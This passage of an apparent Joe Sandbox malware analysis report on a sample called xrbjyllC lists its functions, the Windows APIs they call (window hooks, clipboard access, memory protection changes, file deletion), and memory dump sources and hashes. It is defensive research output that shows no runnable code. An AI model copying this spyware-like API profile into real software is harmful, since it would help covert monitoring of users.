                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                              • API String ID: 1430744539-2962942730
                                                                                              • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                              • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                              Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                              • String ID:
                                                                                              • API String ID: 2598563909-0
                                                                                              • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                              • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                              Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3322701435-0
                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                              Function 2DB85610 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1230 2db85610-2db8569f GetCurrentProcess 1234 2db856a8-2db856dc GetCurrentThread 1230->1234 1235 2db856a1-2db856a7 1230->1235 1236 2db856de-2db856e4 1234->1236 1237 2db856e5-2db85719 GetCurrentProcess 1234->1237 1235->1234 1236->1237 1238 2db8571b-2db85721 1237->1238 1239 2db85722-2db8573d call 2db857e0 1237->1239 1238->1239 1243 2db85743-2db85772 GetCurrentThreadId 1239->1243 1244 2db8577b-2db857dd 1243->1244 1245 2db85774-2db8577a 1243->1245 1245->1244
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB8568E
                                                                                              • GetCurrentThread.KERNEL32 ref: 2DB856CB
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB85708
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2DB85761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 90603652ac0461f7fbaba94812eb17fe7894eb10fb6934b9658f7b0403b322d0
                                                                                              • Instruction ID: 2adb6f33cd6a0f62172af980cc78cf9c0f302246ee7969c0c5f31c3949a7f1c6
                                                                                              • Opcode Fuzzy Hash: 90603652ac0461f7fbaba94812eb17fe7894eb10fb6934b9658f7b0403b322d0
                                                                                              • Instruction Fuzzy Hash: 395145B49006498FDB04CFA9C588BAEBBF1EF48310F20C559E419B73A1D734A985CF66
                                                                                              Function 2DB8560A Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1208 2db8560a-2db8569f GetCurrentProcess 1212 2db856a8-2db856dc GetCurrentThread 1208->1212 1213 2db856a1-2db856a7 1208->1213 1214 2db856de-2db856e4 1212->1214 1215 2db856e5-2db85719 GetCurrentProcess 1212->1215 1213->1212 1214->1215 1216 2db8571b-2db85721 1215->1216 1217 2db85722-2db8573d call 2db857e0 1215->1217 1216->1217 1221 2db85743-2db85772 GetCurrentThreadId 1217->1221 1222 2db8577b-2db857dd 1221->1222 1223 2db85774-2db8577a 1221->1223 1223->1222
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB8568E
                                                                                              • GetCurrentThread.KERNEL32 ref: 2DB856CB
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2DB85708
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2DB85761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 38b754197ebd9daf0e8cf51295f408839562e4dab40ae0b6497fde4d3314a098
                                                                                              • Instruction ID: 8fb7bf020441906940ee7922e2126d17dc7e109299344209c5fa51598a767582
                                                                                              • Opcode Fuzzy Hash: 38b754197ebd9daf0e8cf51295f408839562e4dab40ae0b6497fde4d3314a098
                                                                                              • Instruction Fuzzy Hash: 545146B49006498FDB04CFA9C588BAEBBF1AF48310F208559E459B73A1D734A985CF66
                                                                                              Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1411284514-0
                                                                                              • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                              • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                              Function 2D81AE40 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1891215839.000000002D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2d810000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b501236782a4fc8c2260e5c6b316f271b94066372a30b91d4f25931e78e8d012
                                                                                              • Instruction ID: 1b5d4c77b0a4f9d71dc8f9f2d430b9ac6e6b6c24e2357f8ecca5e6c7cd5e3a73
                                                                                              • Opcode Fuzzy Hash: b501236782a4fc8c2260e5c6b316f271b94066372a30b91d4f25931e78e8d012
                                                                                              • Instruction Fuzzy Hash: 86410271E083958FC700CFB9D4047AEBBF1AF89310F14866AD548A7691DB789845CBE1
                                                                                              Function 2DB81947 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2DB81A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 275ebecea4e09af61022e0b649836a4d3f1c69e081591467dcb506dd8f7f2d59
                                                                                              • Instruction ID: eb3776bc65f31b6ec7af061aa2d529159c14ab171b8352f54c046f3a189d88bd
                                                                                              • Opcode Fuzzy Hash: 275ebecea4e09af61022e0b649836a4d3f1c69e081591467dcb506dd8f7f2d59
                                                                                              • Instruction Fuzzy Hash: 9251CEB1D10209DFDB14CFA9C990ADEBBB1FF48350F20852AE819AB220D7709981CF91
                                                                                              Function 2DB81950 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2DB81A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 9563ea881886c29dce15194e2c788f77d2d70c7b2b2bfe52306956ca49eea286
                                                                                              • Instruction ID: 95663e17d4d4cf32acf57df63524b8fd5767dfb46319ecfba477750ad616e73a
                                                                                              • Opcode Fuzzy Hash: 9563ea881886c29dce15194e2c788f77d2d70c7b2b2bfe52306956ca49eea286
                                                                                              • Instruction Fuzzy Hash: 0341BEB1D113099FDB14CFA9C990ADEBBB5FF48350F20852AE819AB221D7709981CF91
                                                                                              Function 2DB8541C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 2DB867A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: c19890655f6a9780d60ea5de19190ea808a10c092099d7fc19b82024712c761d
                                                                                              • Instruction ID: bcf989a10a19a46d58d31c5257614c0e58bf44e44842fac5a3622fe38acf94c9
                                                                                              • Opcode Fuzzy Hash: c19890655f6a9780d60ea5de19190ea808a10c092099d7fc19b82024712c761d
                                                                                              • Instruction Fuzzy Hash: F4411BB9900285CFCB04CF59C494A9AFBF5FB88314F24C459E519AB321D734A941CFA1
                                                                                              Function 2DB87425 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 0d18ad52791c6909d22d7f627165147af1e0c20db8a962971b24992943af98d6
                                                                                              • Instruction ID: b3cd0baa465da97ac9accc449a8a32dccc43ff19c0daa728f9af543af3531a0a
                                                                                              • Opcode Fuzzy Hash: 0d18ad52791c6909d22d7f627165147af1e0c20db8a962971b24992943af98d6
                                                                                              • Instruction Fuzzy Hash: D4310FB0E01249DFDB14CFA8CA94BDDBBF1EF08308F248059E404BB6A5D7749985CB61
                                                                                              Function 2DB87430 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 955ceae21cd82dba875c06ad8fd980457ebc967f5298a9556b7babb9952118b5
                                                                                              • Instruction ID: 758070053e9c452ab2407728df62fcb6bd026edc2a00f25ec2c9f0f0c6898e27
                                                                                              • Opcode Fuzzy Hash: 955ceae21cd82dba875c06ad8fd980457ebc967f5298a9556b7babb9952118b5
                                                                                              • Instruction Fuzzy Hash: 683100B0901209DFDB14CF99C994BCEBBF5EB48308F248019E404BB2A4D774A985CBA5
                                                                                              Function 2DB85850 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2DB858DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 4a035c0a857377ebd47e234ca38f537f2a14672006986f91da5985002c71211c
                                                                                              • Instruction ID: e51cd6d8a2d5b29881949a40ea15eb80bb722a1da7490041ba05af8a4e0d3a8c
                                                                                              • Opcode Fuzzy Hash: 4a035c0a857377ebd47e234ca38f537f2a14672006986f91da5985002c71211c
                                                                                              • Instruction Fuzzy Hash: 0F21B2B5900259DFDB10CFAAD984ADEBBF5EB48310F14841AE954A7250D374A940CFA5
                                                                                              Function 2DB85858 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2DB858DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: a24df097594bcb6b4e5d644d3a34f21fba6c3d987578f69f9aae5d21eb17f9d4
                                                                                              • Instruction ID: cd7f9e01bfebc688fc1113d4a946e01783e91be04f2110ce304f3c98c5f2fed4
                                                                                              • Opcode Fuzzy Hash: a24df097594bcb6b4e5d644d3a34f21fba6c3d987578f69f9aae5d21eb17f9d4
                                                                                              • Instruction Fuzzy Hash: E521C2B59002599FDB10CFAAD984ADEBFF9EB48320F14841AE958A7350D374A940CFA5
                                                                                              Function 2D182239 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 2D1822B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1890035907.000000002D180000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D180000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2d180000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 8d90cdf5a56939296a09f86f9d2ba3722914bbe7ec171691e3a7a98b7d51746d
                                                                                              • Instruction ID: a2dd399d99bb697b31c4714136941d7e91e183ed4c34f6e995d7216e8fd5e6d4
                                                                                              • Opcode Fuzzy Hash: 8d90cdf5a56939296a09f86f9d2ba3722914bbe7ec171691e3a7a98b7d51746d
                                                                                              • Instruction Fuzzy Hash: 8A2124B5C0065A9BDB14CFA9C5447EEFBF0AB08320F10862AD858B7655D378AA40CFA5
                                                                                              Function 2DB88E20 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2DB88E9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: bc8832fea6592a072345839f26260c6fcf728e7d889fa5a4d2fefb4998f321fc
                                                                                              • Instruction ID: 05dd8180ea6aee351e3d3f31b7a7ab5f13f2d4e4da911d1918061104bf161ca5
                                                                                              • Opcode Fuzzy Hash: bc8832fea6592a072345839f26260c6fcf728e7d889fa5a4d2fefb4998f321fc
                                                                                              • Instruction Fuzzy Hash: B221E0B59002199FCB14DF9AD944BEEFBF5EB88320F10842AE459B7260C774A944CFA5
                                                                                              Function 2DB88E19 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2DB88E9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 946653ed24013b4edfdd64c57dbde2dfc1a1823b928d0509ddb988578de4997b
                                                                                              • Instruction ID: f5d51cfd79781dd1579f63a40bd9385fd53fa2745235ba1d2d8111c52b60b468
                                                                                              • Opcode Fuzzy Hash: 946653ed24013b4edfdd64c57dbde2dfc1a1823b928d0509ddb988578de4997b
                                                                                              • Instruction Fuzzy Hash: 292113B5900209CFCB14DF99D944BEEBBF4AB88320F10842AE469B7260C774A940CFA5
                                                                                              Function 2D182240 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 2D1822B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1890035907.000000002D180000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D180000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2d180000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: e266aab4097c2f5bf3b32e4b9410f9e5c409b2635b9e21fd86f7ace7a9037bc1
                                                                                              • Instruction ID: 330acb4e3ed5edc6afbc8e2cbececede5f4709b29aca9a2ec4d2ba5af3f359c3
                                                                                              • Opcode Fuzzy Hash: e266aab4097c2f5bf3b32e4b9410f9e5c409b2635b9e21fd86f7ace7a9037bc1
                                                                                              • Instruction Fuzzy Hash: 1A1136B1C0065A9BDB14CF9AC540BEEFBF4BB48320F10812AD858B7654D338AA40CFA5
                                                                                              Function 27F693F0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 27F69464
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884960911.0000000027F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 27F60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27f60000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 76106e3245f7f424c45b31bfcb6ce4abc09a8204e40fd97d720952aac674ab60
                                                                                              • Instruction ID: 78324cca24cdffe81b5a5044ec7395d5e09e72312ec5e34f05554436d11466de
                                                                                              • Opcode Fuzzy Hash: 76106e3245f7f424c45b31bfcb6ce4abc09a8204e40fd97d720952aac674ab60
                                                                                              • Instruction Fuzzy Hash: 7D1124B19042099FDB10DFAAC484ADEFBF4EF48320F10842AE469A7210C774A944CFA0
                                                                                              Function 2D81AF28 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 2D81AF8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1891215839.000000002D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2d810000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: 5906ddde84768cccbe86f034ebfd2b0978c71fae0b977e96443814a3c48e757d
                                                                                              • Instruction ID: 63aae4eb28fb6ea0f8fcaece638bc868343855a08e425eccf227de57d6286416
                                                                                              • Opcode Fuzzy Hash: 5906ddde84768cccbe86f034ebfd2b0978c71fae0b977e96443814a3c48e757d
                                                                                              • Instruction Fuzzy Hash: 3011E2B1C006599FDB10DF9AC544BDEFBF4EB48320F11856AE858B7250D378A944CFA5
                                                                                              Function 2DB80E20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 2DB80E86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 00f64ce4f751b70bafdc8d4a725c917e828197d9419f01c428b1df35e9827d04
                                                                                              • Instruction ID: 5cb188e3c21914025507e1d383a1c4223cf6b2a643c1d61ef13f4f7c4ed4550f
                                                                                              • Opcode Fuzzy Hash: 00f64ce4f751b70bafdc8d4a725c917e828197d9419f01c428b1df35e9827d04
                                                                                              • Instruction Fuzzy Hash: D2110CB6C003498FCB10DF9AC544ADEFBF4EF88260F20852AD869B7610D378A545CFA1
                                                                                              Function 2DB80E1A Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 2DB80E86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 71929836dade1ddd548649143a103c85c66e8315c3207dbc04180ec9385f085e
                                                                                              • Instruction ID: 341c29e8886685fe41e2b5cd105dbfe9843e40fc08f33e5e1ef3bec865b2b494
                                                                                              • Opcode Fuzzy Hash: 71929836dade1ddd548649143a103c85c66e8315c3207dbc04180ec9385f085e
                                                                                              • Instruction Fuzzy Hash: 21112DB2C002498FDB10CF9AD584BDEFBF0AF48210F20855AD868B7610D378A545CFA1
                                                                                              Function 2DB86A18 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2DB869F5), ref: 2DB86A7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 81c223eed658f53c3dda4fef812088f74c1158055ee63a97b979b5b75bc1fdc4
                                                                                              • Instruction ID: eab830a3ab1b6f87957f287acd59b67cfe0c12538753f47c9d2dfc1ba10eaf20
                                                                                              • Opcode Fuzzy Hash: 81c223eed658f53c3dda4fef812088f74c1158055ee63a97b979b5b75bc1fdc4
                                                                                              • Instruction Fuzzy Hash: BF1100B58002499FCB10DFAAC584BDEFFF4EB48320F20841AE569B7650D774A940CFA5
